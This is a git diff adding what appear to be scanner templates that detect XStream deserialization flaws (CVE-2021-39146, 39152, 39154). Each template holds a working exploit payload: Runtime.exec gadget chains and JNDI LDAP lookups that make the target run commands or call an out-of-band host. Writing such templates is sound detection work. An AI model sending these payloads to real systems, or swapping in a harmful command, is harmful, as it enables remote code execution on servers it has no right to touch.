+            <dynamic-proxy>
+              <interface>java.lang.Comparable</interface>
+              <handler class='sun.tracing.NullProvider'>
+                <active>true</active>
+                <providerType>java.lang.Comparable</providerType>
+                <probes>
+                  <entry>
+                    <method>
+                      <class>java.lang.Comparable</class>
+                      <name>compareTo</name>
+                      <parameter-types>
+                        <class>java.lang.Object</class>
+                      </parameter-types>
+                    </method>
+                    <sun.tracing.dtrace.DTraceProbe>
+                      <proxy class='java.lang.Runtime'/>
+                      <implementing__method>
+                        <class>java.lang.Runtime</class>
+                        <name>exec</name>
+                        <parameter-types>
+                          <class>java.lang.String</class>
+                        </parameter-types>
+                      </implementing__method>
+                    </sun.tracing.dtrace.DTraceProbe>
+                  </entry>
+                </probes>
+              </handler>
+            </dynamic-proxy>
+            <string>nslookup {{interactsh-url}}</string>
+          </java.util.PriorityQueue>
+        </java.util.PriorityQueue>
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
diff --git a/vulnerabilities/xstream/CVE-2021-39146.yaml b/vulnerabilities/xstream/CVE-2021-39146.yaml
new file mode 100644
index 0000000000..19c30e5994
--- /dev/null
+++ b/vulnerabilities/xstream/CVE-2021-39146.yaml
@@ -0,0 +1,84 @@
+id: CVE-2021-39146
+
+info:
+  name: CVE-2021-39146
+  author: pwnhxl
+  severity: high
+  description: The processed stream at unmarshalling time contains type information to recreate the formerly written objects. XStream creates therefore new instances based on these type information. An attacker can manipulate the processed input stream and replace or inject objects, that result in execution of arbitrary code loaded from a remote server.
+  reference:
+    - https://x-stream.github.io/CVE-2021-39146.html
+  tags: cve,cve-2021,xstream,deserialization,rce
+
+requests:
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/xml
+
+        <sorted-set>
+          <javax.naming.ldap.Rdn_-RdnEntry>
+            <type>test</type>
+            <value class='javax.swing.MultiUIDefaults' serialization='custom'>
+              <unserializable-parents/>
+              <hashtable>
+                  <default>
+                    <loadFactor>0.75</loadFactor>
+                    <threshold>525</threshold>
+                  </default>
+                  <int>700</int>
+                  <int>0</int>
+              </hashtable>
+              <javax.swing.UIDefaults>
+                  <default>
+                    <defaultLocale>zh_CN</defaultLocale>
+                    <resourceCache/>
+                  </default>
+              </javax.swing.UIDefaults>
+              <javax.swing.MultiUIDefaults>
+                  <default>
+                    <tables>
+                    <javax.swing.UIDefaults serialization='custom'>
+                      <unserializable-parents/>
+                      <hashtable>
+                        <default>
+                          <loadFactor>0.75</loadFactor>
+                          <threshold>525</threshold>
+                        </default>
+                        <int>700</int>
+                        <int>1</int>
+                        <string>lazyValue</string>
+                        <javax.swing.UIDefaults_-ProxyLazyValue>
+                          <className>javax.naming.InitialContext</className>
+                          <methodName>doLookup</methodName>
+                          <args>
+                            <string>ldap://{{interactsh-url}}/#evil</string>
+                          </args>
+                        </javax.swing.UIDefaults_-ProxyLazyValue>
+                      </hashtable>
+                      <javax.swing.UIDefaults>
+                        <default>
+                          <defaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/>
+                          <resourceCache/>
+                        </default>
+                      </javax.swing.UIDefaults>
+                    </javax.swing.UIDefaults>
+                    </tables>
+                  </default>
+              </javax.swing.MultiUIDefaults>
+            </value>
+          </javax.naming.ldap.Rdn_-RdnEntry>
+          <javax.naming.ldap.Rdn_-RdnEntry>
+            <type>test</type>
+            <value class='com.sun.org.apache.xpath.internal.objects.XString'>
+              <m__obj class='string'>test</m__obj>
+            </value>
+          </javax.naming.ldap.Rdn_-RdnEntry>
+        </sorted-set>
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
diff --git a/vulnerabilities/xstream/CVE-2021-39152.yaml b/vulnerabilities/xstream/CVE-2021-39152.yaml
new file mode 100644
index 0000000000..b834d869a1
--- /dev/null
+++ b/vulnerabilities/xstream/CVE-2021-39152.yaml
@@ -0,0 +1,49 @@
+id: CVE-2021-39152
+
+info:
+  name: CVE-2021-39152
+  author: pwnhxl
+  severity: high
+  description: The processed stream at unmarshalling time contains type information to recreate the formerly written objects. XStream creates therefore new instances based on these type information. An attacker can manipulate the processed input stream and replace or inject objects, that result in a server-side forgery request.
+  reference:
+    - https://x-stream.github.io/CVE-2021-39152.html
+  tags: cve,cve-2021,xstream,ssrf
+
+requests:
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/xml
+
+        <map>
+          <entry>
+            <jdk.nashorn.internal.runtime.Source_-URLData>
+              <url>http://{{interactsh-url}}/internal/</url>
+              <cs>GBK</cs>
+              <hash>1111</hash>
+              <array>b</array>
+              <length>0</length>
+              <lastModified>0</lastModified>
+            </jdk.nashorn.internal.runtime.Source_-URLData>
+            <jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>
+          </entry>
+          <entry>
+            <jdk.nashorn.internal.runtime.Source_-URLData>
+              <url>http://{{interactsh-url}}/internal/</url>
+              <cs reference='../../../entry/jdk.nashorn.internal.runtime.Source_-URLData/cs'/>
+              <hash>1111</hash>
+              <array>b</array>
+              <length>0</length>
+              <lastModified>0</lastModified>
+            </jdk.nashorn.internal.runtime.Source_-URLData>
+            <jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>
+          </entry>
+        </map>
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
diff --git a/vulnerabilities/xstream/CVE-2021-39154.yaml b/vulnerabilities/xstream/CVE-2021-39154.yaml
new file mode 100644
index 0000000000..ac94171d02
--- /dev/null
+++ b/vulnerabilities/xstream/CVE-2021-39154.yaml
@@ -0,0 +1,84 @@
+id: CVE-2021-39154
+
+info:
+  name: CVE-2021-39154
+  author: pwnhxl
+  severity: high
+  description: All versions until and including version 1.4.17 are affected, if using the version out of the box. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.
+  reference:
+    - https://x-stream.github.io/CVE-2021-39154.html
+  tags: cve,cve-2021,xstream,deserialization,rce
+
+requests:
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/xml
+
+        <sorted-set>
+          <javax.naming.ldap.Rdn_-RdnEntry>
+            <type>ysomap</type>
+            <value class='javax.swing.MultiUIDefaults' serialization='custom'>
+              <unserializable-parents/>
+              <hashtable>
+                <default>
+                  <loadFactor>0.75</loadFactor>
+                  <threshold>525</threshold>
+                </default>
+                <int>700</int>
+                <int>0</int>
+              </hashtable>
+              <javax.swing.UIDefaults>
+                <default>
+                  <defaultLocale>zh_CN</defaultLocale>
+                  <resourceCache/>
+                </default>
+              </javax.swing.UIDefaults>
+              <javax.swing.MultiUIDefaults>
+                <default>
+                  <tables>
+                    <javax.swing.UIDefaults serialization='custom'>
+                      <unserializable-parents/>
+                      <hashtable>
+                        <default>
+                          <loadFactor>0.75</loadFactor>
+                          <threshold>525</threshold>
+                        </default>
+                        <int>700</int>
+                        <int>1</int>
+                        <string>ggg</string>
+                        <javax.swing.UIDefaults_-ProxyLazyValue>
+                          <className>javax.naming.InitialContext</className>
+                          <methodName>doLookup</methodName>
+                          <args>
+                            <arg>ldap://{{interactsh-url}}/CallRemoteMethod</arg>
+                          </args>
+                        </javax.swing.UIDefaults_-ProxyLazyValue>
+                      </hashtable>
+                      <javax.swing.UIDefaults>
+                        <default>
+                          <defaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/>
+                          <resourceCache/>
+                        </default>
+                      </javax.swing.UIDefaults>
+                    </javax.swing.UIDefaults>
+                  </tables>
+                </default>
+              </javax.swing.MultiUIDefaults>
+            </value>
+          </javax.naming.ldap.Rdn_-RdnEntry>
+          <javax.naming.ldap.Rdn_-RdnEntry>
+            <type>ysomap</type>
+            <value class='com.sun.org.apache.xpath.internal.objects.XString'>
+              <m__obj class='string'>test</m__obj>
+            </value>
+          </javax.naming.ldap.Rdn_-RdnEntry>
+        </sorted-set>
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"